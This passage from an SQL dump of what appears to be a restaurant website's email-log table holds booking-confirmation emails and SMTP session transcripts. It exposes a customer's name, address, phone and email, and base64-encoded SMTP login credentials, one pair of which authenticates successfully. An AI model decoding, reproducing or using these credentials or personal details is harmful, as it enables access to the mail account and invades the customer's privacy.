scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Note:</th>\n					<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22481,1225,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(22482,1225,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 14:04:19 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22483,1226,'solution','Not found, check status column for more info.'),(22484,1226,'success','1'),(22485,1226,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22486,1226,'to_header','raf.biondi@libero.it'),(22487,1226,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22488,1226,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22489,1226,'original_to','raf.biondi@libero.it'),(22490,1226,'original_subject','Your Sol Y Mar, ristorante a Riccione order has been received!'),(22491,1226,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi Raffaele,</p>\n<p style=\"margin: 0 0 16px;\">Just to let you know — we\'ve received your order #1222, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Order #1222] (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Caparra - 2		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Note:</th>\n					<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22492,1226,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(22493,1226,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\nh=3D\"100%\" id=3D\"template_header\" style=3D\'background-color: #557da1; co=\r\nlor: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; ve=\r\nrtical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto,=\r\n Arial, sans-serif; border-radius: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=\r\n=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td id=3D\"header_wra=\r\npper\" style=3D\"padding: 36px 48px; display: block;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<h1 style=3D\'font-family: \"Helvetica Neue\", Helveti=\r\nca, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-h=\r\neight: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4;=\r\n color: #ffffff; background-color: inherit;\'>Thank you for your order</h=\r\n1>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=\r\n=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- End Header -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=\r\n<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- B=\r\nody -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"=\r\n0\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"=\r\ntop\" id=3D\"body_content\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\"=\r\n width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding:=\r\n 48px 48px 32px;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div i=\r\nd=3D\"body_content_inner\" style=3D\'color: #737373; font-family: \"Helvetic=\r\na Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-hei=\r\nght: 150%; text-align: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">Hi Ra=\r\nffaele,</p>=0A<p style=3D\"margin: 0 0 16px;\">Just to let you know =E2=80=\r\n=94 we\'ve received your order #1222, and it is now being processed:</p>=\r\n=0A=0A=0A<h2 style=3D\'color: #557da1; display: block; font-family: \"Helv=\r\netica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font=\r\n-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>=\r\n=0A=09[Order #1222] (5 November 2020)</h2>=0A=0A<div style=3D\"margin-bot=\r\ntom: 40px;\">=0A=09<table class=3D\"td\" cellspacing=3D\"0\" cellpadding=3D\"6=\r\n\" border=3D\"1\" style=3D\"color: #737373; border: 1px solid #e4e4e4; verti=\r\ncal-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica=\r\n, Roboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=09=09=09<tr>=0A=09=09=\r\n=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1p=\r\nx solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left=\r\n;\">Product</th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"co=\r\nlor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding=\r\n: 12px; text-align: left;\">Quantity</th>=0A=09=09=09=09<th class=3D\"td\"=\r\n scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4; verti=\r\ncal-align: middle; padding: 12px; text-align: left;\">Price</th>=0A=09=09=\r\n=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=0A=09=09=09=09<tr class=3D\"ord=\r\ner_item\">=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px=\r\n solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle;=\r\n font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; wo=\r\nrd-wrap: break-word;\">=0A=09=09Caparra - 2=09=09</td>=0A=09=09<td class=\r\n=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12p=\r\nx; text-align: left; vertical-align: middle; font-family: \'Helvetica Neu=\r\ne\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=091=09=09</td>=0A=\r\n=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e=\r\n4; padding: 12px; text-align: left; vertical-align: middle; font-family:=\r\n \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=09<s=\r\npan class=3D\"woocommerce-Price-amount amount\">30,00<span class=3D\"woocom=\r\nmerce-Price-currencySymbol\">=E2=82=AC</span></span>=09=09</td>=0A=09</tr=\r\n>=0A=09=0A=09=09</tbody>=0A=09=09<tfoot>=0A=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; p=\r\nadding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>=\r\n=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1=\r\npx solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: lef=\r\nt; border-top-width: 4px;\"><span class=3D\"woocommerce-Price-amount amoun=\r\nt\">30,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span=\r\n></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr=\r\n>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; p=\r\nadding: 12px; text-align: left;\">Payment method:</th>=0A=09=09=09=09=09=\r\n=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4;=\r\n vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>=\r\n=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #7=\r\n37373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px;=\r\n text-align: left;\">Total:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" sty=\r\nle=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle;=\r\n padding: 12px; text-align: left;\"><span class=3D\"woocommerce-Price-amou=\r\nnt amount\">30,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=\r\n=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" st=\r\nyle=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle=\r\n; padding: 12px; text-align: left;\">Note:</th>=0A=09=09=09=09=09<td clas=\r\ns=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-al=\r\nign: middle; padding: 12px; text-align: left;\">Prenotazione per 6/11 pra=\r\nnzo ore 13 circa</td>=0A=09=09=09=09</tr>=0A=09=09=09=09=09=09</tfoot>=\r\n=0A=09</table>=0A</div>=0A=0A=0A<table id=3D\"addresses\" cellspacing=3D\"0=\r\n\" cellpadding=3D\"0\" border=3D\"0\" style=3D\"width: 100%; vertical-align: t=\r\nop; margin-bottom: 40px; padding: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"t=\r\nop\" width=3D\"50%\" style=3D\"text-align: left; font-family: \'Helvetica Neu=\r\ne\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">=0A=09=\r\n=09=09<h2 style=3D\'color: #557da1; display: block; font-family: \"Helveti=\r\nca Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-we=\r\night: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Bill=\r\ning address</h2>=0A=0A=09=09=09<address class=3D\"address\" style=3D\"paddi=\r\nng: 12px; color: #737373; border: 1px solid #e4e4e4;\">=0A=09=09=09=09Raf=\r\nfaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA=\r\n=09=09=09=09=09=09=09=09=09<br><a href=3D\"tel:3479247631\" style=3D\"color=\r\n: #557da1; font-weight: normal; text-decoration: underline;\">3479247631<=\r\n/a>=09=09=09=09=09=09=09=09=09=09=09=09=09<br>raf.biondi@libero.it=09=09=\r\n=09=09=09=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p=\r\n style=3D\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!<=\r\n/p>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=\r\n=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=\r\n=09=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=\r\n=09=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=\r\n=09=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\"=\r\n>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"to=\r\np\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100=\r\n%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-=\r\nradius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", H=\r\nelvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%;=\r\n text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=\r\n=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09=\r\n</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kakYb-0003bI-8D\r\n'),(22494,1227,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22495,1227,'success',''),(22496,1227,'from_header','Raffaele biondi <notifiche@ristorantesolymar.it>'),(22497,1227,'to_header','teosphone@gmail.com'),(22498,1227,'reply_to_header','raf.biondi@libero.it'),(22499,1227,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22500,1227,'original_to','teosphone@gmail.com'),(22501,1227,'original_subject','Da sito Sol Y Mar: \"Conferma prenotazione\"'),(22502,1227,'original_message','Da: Raffaele biondi <raf.biondi@libero.it>\nTelefono: 3479247631\nOggetto: Conferma prenotazione\n\nCorpo del messaggio:\nBuonasera sono a chiedere conferma della corretta prenotazione effettuata tramite sito per domani 6/11  pranzo per 2 nome Raffaele biondi grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22503,1227,'original_headers','From: Raffaele biondi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: raf.biondi@libero.it\n'),(22504,1227,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 14:23:32 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22505,1228,'solution','Not found, check status column for more info.'),(22506,1228,'success','1'),(22507,1228,'from_header','Raffaele biondi <notifiche@ristorantesolymar.it>'),(22508,1228,'to_header','teosphone@gmail.com'),(22509,1228,'reply_to_header','raf.biondi@libero.it'),(22510,1228,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22511,1228,'original_to','teosphone@gmail.com'),(22512,1228,'original_subject','Da sito Sol Y Mar: \"Conferma prenotazione\"'),(22513,1228,'original_message','Da: Raffaele biondi <raf.biondi@libero.it>\nTelefono: 3479247631\nOggetto: Conferma prenotazione\n\nCorpo del messaggio:\nBuonasera sono a chiedere conferma della corretta prenotazione effettuata tramite sito per domani 6/11  pranzo per 2 nome Raffaele biondi grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22514,1228,'original_headers','From: Raffaele biondi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: raf.biondi@libero.it\n'),(22515,1228,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 14:23:34 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL 